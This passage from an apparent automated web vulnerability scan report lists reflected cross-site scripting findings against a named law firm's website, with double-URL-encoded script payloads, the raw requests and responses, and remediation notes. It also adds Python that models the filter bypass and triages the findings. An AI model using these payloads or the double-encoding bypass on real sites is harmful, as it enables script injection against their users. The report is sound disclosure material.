<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/csse5847"><script>alert(1)</script>63b9f9dcf48/ui/ui.tabs.css" value="">
...[SNIP]...

2.93. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.tabs.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89 was submitted in the REST URL parameter 2. This input was echoed as 81a0d"><script>alert(1)</script>ee949bf1e89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui81a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eee949bf1e89/ui.tabs.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui81a0d"><script>alert(1)</script>ee949bf1e89/ui.tabs.css" value="">
...[SNIP]...

2.94. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.tabs.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 was submitted in the REST URL parameter 3. This input was echoed as b92b8"><script>alert(1)</script>93dc2b44d56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.tabs.cssb92b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93dc2b44d56 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.tabs.cssb92b8"><script>alert(1)</script>93dc2b44d56" value="">
...[SNIP]...

2.95. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.theme.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d was submitted in the REST URL parameter 1. This input was echoed as f8b59"><script>alert(1)</script>b748a2e0a4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssf8b59%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb748a2e0a4d/ui/ui.theme.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssf8b59"><script>alert(1)</script>b748a2e0a4d/ui/ui.theme.css" value="">
...[SNIP]...

2.96. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.theme.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372 was submitted in the REST URL parameter 2. This input was echoed as 9f482"><script>alert(1)</script>5de43e0d372 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui9f482%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5de43e0d372/ui.theme.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui9f482"><script>alert(1)</script>5de43e0d372/ui.theme.css" value="">
...[SNIP]...

2.97. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.theme.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c was submitted in the REST URL parameter 3. This input was echoed as 20285"><script>alert(1)</script>9291800f59c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

The web server has already URL-decoded the request path once, so the application should not decode the value of REST URL parameter 3 a second time; the double-encoded payload only works because that second decode happens after the character blacklist has run. Any validation that remains must be applied to the fully canonicalised value, and the value must be HTML-attribute-encoded before it is written into the hidden input's name attribute. That output encoding, not the blacklist, is the control that closes this issue.

Request

GET /css/ui/ui.theme.css20285%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9291800f59c HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.theme.css20285"><script>alert(1)</script>9291800f59c" value="">
...[SNIP]...
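The response snippets in these findings show the requested URL inside the name attribute of a hidden input whose name begins 404;http://www.wileyrein.com:80/, which is the query string IIS passes to a custom error page. The model below is an added illustration, not code from the scan report or from the scanned site: it assumes (hypothetically) that the error page rebuilds hidden inputs from that query string, and shows why a blacklist that runs on the once-decoded string sees nothing wrong with a double-encoded path, alongside a hardened renderer that encodes on output. The host name, request paths and function names are constructed for the example.

```python
from html import escape
from urllib.parse import unquote, unquote_plus

BLOCKED = ('<', '>', '"', "'")   # the naive character blacklist the report describes

# Constructed request paths: the same payload single- and double-URL-encoded.
SINGLE_ENCODED_PATH = "/js%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e/menu.js"
DOUBLE_ENCODED_PATH = "/js%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e/menu.js"


def custom_error_query(request_path: str) -> str:
    """Decode #1.  The web server decodes the request path once and hands it to
    the custom 404 page as the query string '404;<absolute URL>' (the shape seen
    in the report's hidden-input names; the host here is a placeholder)."""
    return "404;http://www.example.test:80" + unquote(request_path)


def parse_query(query_string: str):
    """Decode #2.  A minimal query-string parser; like any such parser it
    URL-decodes names and values, which is where %22 finally becomes a quote."""
    pairs = []
    for part in query_string.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def raw_looks_hostile(query_string: str) -> bool:
    """Validation on the wrong representation: the still-encoded query string."""
    return any(ch in query_string for ch in BLOCKED)


def canonical_looks_hostile(pairs) -> bool:
    """Validation on the right representation: after every decode has run."""
    return any(ch in name + value for name, value in pairs for ch in BLOCKED)


def vulnerable_hidden_inputs(query_string: str) -> str:
    """Blacklist the raw string, decode afterwards, echo without encoding.
    A single-encoded quote is caught; a double-encoded one sails through."""
    if raw_looks_hostile(query_string):
        return "<p>Bad request</p>"
    return "".join(f'<input type="hidden" name="{n}" value="{v}">'
                   for n, v in parse_query(query_string))


def fixed_hidden_inputs(query_string: str) -> str:
    """Decode exactly once, then HTML-attribute-encode on output.  If a
    blacklist is kept at all, canonical_looks_hostile(pairs) is the place to
    apply it, i.e. after decoding, never before."""
    pairs = parse_query(query_string)
    return "".join(f'<input type="hidden" name="{escape(n, quote=True)}" '
                   f'value="{escape(v, quote=True)}">' for n, v in pairs)


if __name__ == "__main__":
    for label, path in (("single", SINGLE_ENCODED_PATH), ("double", DOUBLE_ENCODED_PATH)):
        qs = custom_error_query(path)
        print(label, "raw check:", raw_looks_hostile(qs),
              "canonical check:", canonical_looks_hostile(parse_query(qs)))
        print("  vulnerable:", vulnerable_hidden_inputs(qs))
        print("  fixed:     ", fixed_hidden_inputs(qs))
```

The raw check passes the double-encoded request and the canonical check rejects it, which is the whole of the remediation note in two lines; the hardened renderer does not need the check at all, because the encoded quote can no longer terminate the attribute.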

2.98. http://www.wileyrein.com/index.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 was submitted in the REST URL parameter 1. This input was echoed as 30fea"><script>alert(1)</script>818c7828cb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

The web server has already URL-decoded the request path once, so the application should not decode the value of REST URL parameter 1 a second time; the double-encoded payload only works because that second decode happens after the character blacklist has run. Any validation that remains must be applied to the fully canonicalised value, and the value must be HTML-attribute-encoded before it is written into the hidden input's name attribute. That output encoding, not the blacklist, is the control that closes this issue.

Request

GET /index.cfm30fea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e818c7828cb8 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/index.cfm30fea"><script>alert(1)</script>818c7828cb8" value="">
...[SNIP]...

2.99. http://www.wileyrein.com/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f23"><script>alert(1)</script>472c4d98eb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?e7f23"><script>alert(1)</script>472c4d98eb6=1 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="e7f23"><script>alert(1)</script>472c4d98eb6" value="1">
...[SNIP]...
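This report lists the same sink more than a dozen times, and the only difference between a finding that matters and one that does not is whether the quote actually terminates the attribute when a browser tokenises the page. A triage check that parses a saved response the way a browser would is therefore more reliable than searching for the payload string. The helper below is an added example, not part of the original report: the two response bodies are constructed from the snippet above (one as reported, one as it would look with correct attribute encoding), and triage is a hypothetical name.

```python
from html.parser import HTMLParser


class ReflectionProbe(HTMLParser):
    """Records where a marker-wrapped payload ends up after tokenisation:
    still inside an attribute value, or as a freshly created <script> element."""

    def __init__(self, marker_prefix, marker_suffix, probe_text="alert(1)"):
        super().__init__()            # convert_charrefs=True: &lt; is unescaped in attrs/data
        self.markers = (marker_prefix, marker_suffix)
        self.probe_text = probe_text
        self.in_script = False
        self.in_attribute = False
        self.in_text = False
        self.script_injected = False

    def _has_marker(self, text):
        return any(m in text for m in self.markers)

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        for name, value in attrs:
            if self._has_marker(name) or self._has_marker(value or ""):
                self.in_attribute = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self._has_marker(data):
            self.in_text = True
        if self.in_script and self.probe_text in data:
            self.script_injected = True


def triage(body, marker_prefix, marker_suffix, probe_text="alert(1)"):
    """Classify a response body: was the marker reflected at all, did it land in
    an attribute, and did the payload become executable script content."""
    probe = ReflectionProbe(marker_prefix, marker_suffix, probe_text)
    probe.feed(body)
    probe.close()
    return {
        "reflected": probe.in_attribute or probe.in_text or probe.script_injected,
        "in_attribute": probe.in_attribute,
        "script_injected": probe.script_injected,
    }


# Constructed from the response snippet in the report: as served, and as it
# would look if the name attribute were HTML-encoded.
VULNERABLE_BODY = (
    '<html><head>\n'
    '<input type="hidden" name="404;http://www.wileyrein.com:80/jsd732e">'
    '<script>alert(1)</script>3c700324221/jq.equalheights.js" value="">\n'
    '</head></html>'
)
ENCODED_BODY = (
    '<html><head>\n'
    '<input type="hidden" name="404;http://www.wileyrein.com:80/jsd732e'
    '&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;3c700324221/jq.equalheights.js" value="">\n'
    '</head></html>'
)

if __name__ == "__main__":
    print("as served:", triage(VULNERABLE_BODY, "d732e", "3c700324221"))
    print("encoded:  ", triage(ENCODED_BODY, "d732e", "3c700324221"))
```

Both bodies reflect the marker, so a plain substring search would flag both; only the first yields a script element, and that is the one worth a High rating. The same probe, fed the response for the parameter-name case above, reports the identical outcome, since the sink is the same hidden-input attribute.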

2.100. http://www.wileyrein.com/js/jq.equalheights.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jq.equalheights.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221 was submitted in the REST URL parameter 1. This input was echoed as d732e"><script>alert(1)</script>3c700324221 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

The web server has already URL-decoded the request path once, so the application should not decode the value of REST URL parameter 1 a second time; the double-encoded payload only works because that second decode happens after the character blacklist has run. Any validation that remains must be applied to the fully canonicalised value, and the value must be HTML-attribute-encoded before it is written into the hidden input's name attribute. That output encoding, not the blacklist, is the control that closes this issue.

Request

GET /jsd732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221/jq.equalheights.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/jsd732e"><script>alert(1)</script>3c700324221/jq.equalheights.js" value="">
...[SNIP]...

2.101. http://www.wileyrein.com/js/jq.equalheights.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jq.equalheights.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b was submitted in the REST URL parameter 2. This input was echoed as f70d5"><script>alert(1)</script>0445fb7d91b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

The web server has already URL-decoded the request path once, so the application should not decode the value of REST URL parameter 2 a second time; the double-encoded payload only works because that second decode happens after the character blacklist has run. Any validation that remains must be applied to the fully canonicalised value, and the value must be HTML-attribute-encoded before it is written into the hidden input's name attribute. That output encoding, not the blacklist, is the control that closes this issue.

Request

GET /js/jq.equalheights.jsf70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/jq.equalheights.jsf70d5"><script>alert(1)</script>0445fb7d91b" value="">
...[SNIP]...

2.102. http://www.wileyrein.com/js/jquery.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45 was submitted in the REST URL parameter 1. This input was echoed as 67315"><script>alert(1)</script>635a97b6d45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

The web server has already URL-decoded the request path once, so the application should not decode the value of REST URL parameter 1 a second time; the double-encoded payload only works because that second decode happens after the character blacklist has run. Any validation that remains must be applied to the fully canonicalised value, and the value must be HTML-attribute-encoded before it is written into the hidden input's name attribute. That output encoding, not the blacklist, is the control that closes this issue.

Request

GET /js67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45/jquery.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js67315"><script>alert(1)</script>635a97b6d45/jquery.js" value="">
...[SNIP]...

2.103. http://www.wileyrein.com/js/jquery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d was submitted in the REST URL parameter 2. This input was echoed as d428a"><script>alert(1)</script>229db4da92d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

The web server has already URL-decoded the request path once, so the application should not decode the value of REST URL parameter 2 a second time; the double-encoded payload only works because that second decode happens after the character blacklist has run. Any validation that remains must be applied to the fully canonicalised value, and the value must be HTML-attribute-encoded before it is written into the hidden input's name attribute. That output encoding, not the blacklist, is the control that closes this issue.

Request

GET /js/jquery.jsd428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/jquery.jsd428a"><script>alert(1)</script>229db4da92d" value="">
...[SNIP]...

2.104. http://www.wileyrein.com/js/menu.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/menu.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24 was submitted in the REST URL parameter 1. This input was echoed as a0519"><script>alert(1)</script>056a75bdc24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

The web server has already URL-decoded the request path once, so the application should not decode the value of REST URL parameter 1 a second time; the double-encoded payload only works because that second decode happens after the character blacklist has run. Any validation that remains must be applied to the fully canonicalised value, and the value must be HTML-attribute-encoded before it is written into the hidden input's name attribute. That output encoding, not the blacklist, is the control that closes this issue.

Request

GET /jsa0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24/menu.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
